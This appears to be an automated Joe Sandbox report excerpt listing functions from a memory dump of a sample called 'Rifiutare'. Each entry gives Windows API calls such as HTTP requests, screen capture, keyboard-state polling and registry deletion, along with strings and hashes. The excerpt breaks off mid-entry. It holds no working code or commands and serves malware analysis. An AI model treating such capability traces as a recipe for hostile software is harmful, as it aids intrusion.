Instruction Fuzzy Hash: 12124F71A04119EFDB18CF94C884EEEBBB9FF45714F248098E9159B252D731EE46CBA0

Function 00CC72C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00CC73D2

Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CC7446
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CC7468
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC747B
DestroyWindow.USER32(?), ref: 00CC749C
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C30000,00000000), ref: 00CC74CB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC74E4
GetDesktopWindow.USER32 ref: 00CC74FD
GetWindowRect.USER32(00000000), ref: 00CC7504
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CC751C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CC7534

Part of subcall function 00C32184: GetWindowLongW.USER32(?,000000EB), ref: 00C32192

Strings

0, xrefs: 00CC737F
tooltips_class32, xrefs: 00CC743F, 00CC74C4

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: c8d1a370a2571e34958c9e4d46fc03144f74c3b8ebdc17d4920b333fe12640a2
Instruction ID: ade068d37f903f765c1835c0ebef6a7a7b22fb210cd31fcad429da73ab64556e
Opcode Fuzzy Hash: c8d1a370a2571e34958c9e4d46fc03144f74c3b8ebdc17d4920b333fe12640a2
Instruction Fuzzy Hash: 40716770548348AFD725CF18D848F6ABBE9EB89304F040A2DF995872A1C770EA02DF52

Function 00CC9726 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2

DragQueryPoint.SHELL32(?,?), ref: 00CC974F

Part of subcall function 00CC7C5B: ClientToScreen.USER32(?,?), ref: 00CC7C81
Part of subcall function 00CC7C5B: GetWindowRect.USER32(?,?), ref: 00CC7CF7
Part of subcall function 00CC7C5B: PtInRect.USER32(?,?,?), ref: 00CC7D07

SendMessageW.USER32(?,000000B0,?,?), ref: 00CC97B8
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CC97C3
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CC97E6
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CC982D
SendMessageW.USER32(?,000000B0,?,?), ref: 00CC9846
SendMessageW.USER32(?,000000B1,?,?), ref: 00CC985D
SendMessageW.USER32(?,000000B1,?,?), ref: 00CC987F
DragFinish.SHELL32(?), ref: 00CC9886
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00CC9979

Strings

@GUI_DRAGFILE, xrefs: 00CC9928
@GUI_DROPID, xrefs: 00CC98A6
@GUI_DRAGID, xrefs: 00CC98F1

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 96666380f783034f5008f0d48e20e342c6c03292483e36a41fab9534cc55ca0f
Instruction ID: 4fdbc7ed22ed7f5a9c4d54e4f3a96623d4d8e981f22c1f564f2dbaced66536e4
Opcode Fuzzy Hash: 96666380f783034f5008f0d48e20e342c6c03292483e36a41fab9534cc55ca0f
Instruction Fuzzy Hash: 23617E71508305AFC705EF50DC89EAFBBE8EF89750F00092DF596931A1DB709A49DB62

Function 00CACCA9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CACCE3
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CACCF6
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CACD0A
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CACD23
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CACD66
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CACD7C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CACD87
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CACDB7
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CACE0F
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CACE23
InternetCloseHandle.WININET(00000000), ref: 00CACE2E

Strings

, xrefs: 00CACDA8

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 6eb020123bd6298faf4e8513b96bc4eff11222064178d3a8d37332da09ac2eff
Instruction ID: 35558ccf76afa88375b6de2a3f1582fde0b91427bfcb03d9470c3a49a8121cbb
Opcode Fuzzy Hash: 6eb020123bd6298faf4e8513b96bc4eff11222064178d3a8d37332da09ac2eff
Instruction Fuzzy Hash: BD513AB150060ABFDB219F61C888BAB7BBCFB09758F004429F956D6250D734EE44ABA0

Function 00CC8B77 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CC8B9A
GetFileSize.KERNEL32(00000000,00000000), ref: 00CC8BAA
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CC8BB5
CloseHandle.KERNEL32(00000000), ref: 00CC8BC2
GlobalLock.KERNEL32(00000000), ref: 00CC8BD0
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CC8BDF
GlobalUnlock.KERNEL32(00000000), ref: 00CC8BE8
CloseHandle.KERNEL32(00000000), ref: 00CC8BEF
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CC8C00
OleLoadPicture.OLEAUT32(?,00000000,00000000,00CD0BFC,?), ref: 00CC8C19
GlobalFree.KERNEL32(00000000), ref: 00CC8C29
GetObjectW.GDI32(?,00000018,000000FF), ref: 00CC8C49
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CC8C79
DeleteObject.GDI32(00000000), ref: 00CC8CA1
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CC8CB7

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9e118fa97f3637f67b2bf66bbc068bf0fdbb82f00443e6235653420ac6ea789d
Instruction ID: 352fa0ccc27bcbca9439eff1fc0cdd4eaf9a2b85e4f8e7a846370de5604e2a16
Opcode Fuzzy Hash: 9e118fa97f3637f67b2bf66bbc068bf0fdbb82f00443e6235653420ac6ea789d
Instruction Fuzzy Hash: 66410675600209AFDB119F65DC88FAFBBB8FB89711F144068F916D7260DB70AE45CB60

Function 00CB2D98 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00CB2E14
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CB2E24
CreateCompatibleDC.GDI32(?), ref: 00CB2E30
SelectObject.GDI32(00000000,?), ref: 00CB2E3D
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CB2EA9
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CB2EE8
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CB2F0C
SelectObject.GDI32(?,?), ref: 00CB2F14
DeleteObject.GDI32(?), ref: 00CB2F1D
DeleteDC.GDI32(?), ref: 00CB2F24
ReleaseDC.USER32(00000000,?), ref: 00CB2F2F

Strings

(, xrefs: 00CB2EC9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: fc7259a7e5fc47382f217cc9f9b5be805df22e52842eee35d1671afc345f65ff
Instruction ID: 4b13921064cfdfe36d3e7eede49c52cab8f1409b11a4df435ab3f36ae828100c
Opcode Fuzzy Hash: fc7259a7e5fc47382f217cc9f9b5be805df22e52842eee35d1671afc345f65ff
Instruction Fuzzy Hash: E861B0B5D00219AFCF05CFA8D884EAEBBB6FF48310F248529E956A7250D771A941DF60

Function 00C95162 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00C9519E
GetWindowTextW.USER32(?,?,00000400), ref: 00C951E0
_wcslen.LIBCMT ref: 00C951F1
CharUpperBuffW.USER32(?,00000000), ref: 00C951FD
_wcsstr.LIBVCRUNTIME ref: 00C95232
GetClassNameW.USER32(00000018,?,00000400), ref: 00C9526A
GetWindowTextW.USER32(?,?,00000400), ref: 00C952A3
GetClassNameW.USER32(00000018,?,00000400), ref: 00C952FD
GetClassNameW.USER32(?,?,00000400), ref: 00C9532F
GetWindowRect.USER32(?,?), ref: 00C953A7

Strings

ThumbnailClass, xrefs: 00C95275, 00C95308

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 8c259f3d7804aa6a12ccfea51711aed495303f4157534ed7f5bc64d8dd49807c
Instruction ID: 9f45952eb9ba669f4d60bd1aeaeead21f929efb18149a7ed1034d78e2eb7663c
Opcode Fuzzy Hash: 8c259f3d7804aa6a12ccfea51711aed495303f4157534ed7f5bc64d8dd49807c
Instruction Fuzzy Hash: DB91D471104B06AFDB0ADF24C898FAEB7A8FF40344F144529FAA582191EB71EE55CB91

Function 00C9C7A2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00D029B0,000000FF,00000000,00000030), ref: 00C9C81E
SetMenuItemInfoW.USER32(00D029B0,00000004,00000000,00000030), ref: 00C9C853
Sleep.KERNEL32(000001F4), ref: 00C9C865
GetMenuItemCount.USER32(?), ref: 00C9C8AB
GetMenuItemID.USER32(?,00000000), ref: 00C9C8C8
GetMenuItemID.USER32(?,-00000001), ref: 00C9C8F4
GetMenuItemID.USER32(?,?), ref: 00C9C93B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C981
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C996
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C9B7

Strings

0, xrefs: 00C9C7AF

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 7df2e05c1e89cf76b736597cab1c366eace6014907f18974e6aa281a59312c35
Instruction ID: 9891093fe106b22254ff9206b87206a742352258d587e2c31df23db28ada5061
Opcode Fuzzy Hash: 7df2e05c1e89cf76b736597cab1c366eace6014907f18974e6aa281a59312c35
Instruction Fuzzy Hash: BA617AB190025AAFDF11CF68D9CCBFEBBA8EB05344F154069E856A3291D734AE01DB60

Function 00CBD3AE Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBD3DE
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00CBD407
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CBD4C2

Part of subcall function 00CBD3AE: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00CBD424
Part of subcall function 00CBD3AE: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00CBD437
Part of subcall function 00CBD3AE: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CBD449
Part of subcall function 00CBD3AE: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00CBD47F
Part of subcall function 00CBD3AE: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBD4A2

RegDeleteKeyW.ADVAPI32(?,?), ref: 00CBD46D

Strings

advapi32.dll, xrefs: 00CBD432
RegDeleteKeyExW, xrefs: 00CBD443

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 2b9ac7c1c23f3b52c7e4c3a50e3f9c26699ab9d16399a114d8616c8a4cc73462
Instruction ID: 58dbc60e055abe812fabe1032787158bb7b7ec5ce8c7670f1d34173f2b84b68b
Opcode Fuzzy Hash: 2b9ac7c1c23f3b52c7e4c3a50e3f9c26699ab9d16399a114d8616c8a4cc73462
Instruction Fuzzy Hash: A8318072901129BBD7209B91DC88FFFBB7CEF15710F000165F917E2150EB34AA459AB0

Function 00C9EE87 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C9EE8B

Part of subcall function 00C4EDA7: timeGetTime.WINMM(?,?,00C9EEAB), ref: 00C4EDAB

Sleep.KERNEL32(0000000A), ref: 00C9EEB8
EnumThreadWindows.USER32(?,Function_0006EE3C,00000000), ref: 00C9EEDC
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C9EEFE
SetActiveWindow.USER32 ref: 00C9EF1D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C9EF2B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C9EF4A
Sleep.KERNEL32(000000FA), ref: 00C9EF55
IsWindow.USER32 ref: 00C9EF61
EndDialog.USER32(00000000), ref: 00C9EF72

Strings

BUTTON, xrefs: 00C9EEF0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: dc5fa9575468936f1194d54ff6a2c9221c5a8bc785396ac608d1e90465a2a70f
Instruction ID: 01825269e0e32799c6f21ace659748354668ef716e73f6cc0405c3f6ec905ac7
Opcode Fuzzy Hash: dc5fa9575468936f1194d54ff6a2c9221c5a8bc785396ac608d1e90465a2a70f
Instruction Fuzzy Hash: 44212770214345BFEB05EFA1EC8CF2A7B69FB64B45B440029F51BD23A1CA729D449A61

Function 00C9F1D3 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C9F234
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C9F24A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C9F25B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C9F26D
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C9F27E

Strings

status PlayMe mode, xrefs: 00C9F22F
play PlayMe, xrefs: 00C9F279
open , xrefs: 00C9F1E3
alias PlayMe, xrefs: 00C9F20D
close PlayMe, xrefs: 00C9F245, 00C9F272
play PlayMe wait, xrefs: 00C9F268

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7e1ab51e5024dc07cf22932d070a013052b29f78ed4d2c144a04f2c55753fb69
Instruction ID: e19972da6e69ff5fcd280ee4292cb61d796153c718036df2dfaa114a8d15b2c1
Opcode Fuzzy Hash: 7e1ab51e5024dc07cf22932d070a013052b29f78ed4d2c144a04f2c55753fb69
Instruction Fuzzy Hash: 2211A370A9411D79DB60A7A1DC4EFFF6A7CEBD2B40F000539B511E20D1DAA05E05C5B2

Function 00C9A7B5 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C9A836
SetKeyboardState.USER32(?), ref: 00C9A8A1
GetAsyncKeyState.USER32(000000A0), ref: 00C9A8C1
GetKeyState.USER32(000000A0), ref: 00C9A8D8
GetAsyncKeyState.USER32(000000A1), ref: 00C9A907
GetKeyState.USER32(000000A1), ref: 00C9A918
GetAsyncKeyState.USER32(00000011), ref: 00C9A944
GetKeyState.USER32(00000011), ref: 00C9A952
GetAsyncKeyState.USER32(00000012), ref: 00C9A97B
GetKeyState.USER32(00000012), ref: 00C9A989
GetAsyncKeyState.USER32(0000005B), ref: 00C9A9B2
GetKeyState.USER32(0000005B), ref: 00C9A9C0

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b02ea0aafe2efdbedda87ee1d83de66ee425700ae6e2795094f0594e69974c5a
Instruction ID: 51a445495408c0f0623d2e76bb06a6df6dd941a809b1b8bcd877a2297e237c06
Opcode Fuzzy Hash: b02ea0aafe2efdbedda87ee1d83de66ee425700ae6e2795094f0594e69974c5a
Instruction Fuzzy Hash: A251B52090478869EF35D7A089197EABFF4AF01380F098599D5D25A1C2DA64AF4CC7E7

Function 00C964E2 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C964FE
GetWindowRect.USER32(00000000,?), ref: 00C96517
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C96575
GetDlgItem.USER32(?,00000002), ref: 00C96585
GetWindowRect.USER32(00000000,?), ref: 00C96597
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C965EB
GetDlgItem.USER32(?,000003E9), ref: 00C965F9
GetWindowRect.USER32(00000000,?), ref: 00C9660B
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C9664D
GetDlgItem.USER32(?,000003EA), ref: 00C96660
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C96676
InvalidateRect.USER32(?,00000000,00000001), ref: 00C96683

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 6ec37637ee14276f1beeb617f6743060ee4a95028629663d0eab4be1bb163719
Instruction ID: dc7f20979454baec9b4b0ccb177411b0b84ab08855b97d28865564e6d421ea44
Opcode Fuzzy Hash: 6ec37637ee14276f1beeb617f6743060ee4a95028629663d0eab4be1bb163719
Instruction Fuzzy Hash: FD51EFB1A00205AFDF18CF69DD89BAEBBB5FB48310F518129F516E7294D770AE04CB50

Function 00C316B2 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3670F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C316CD,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C36772

DestroyWindow.USER32(?), ref: 00C31766
KillTimer.USER32(00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C31800
DestroyAcceleratorTable.USER32(00000000), ref: 00C72BFF
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C72C2D
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000,?), ref: 00C72C44
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C3169F,00000000), ref: 00C72C60
DeleteObject.GDI32(00000000), ref: 00C72C72

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

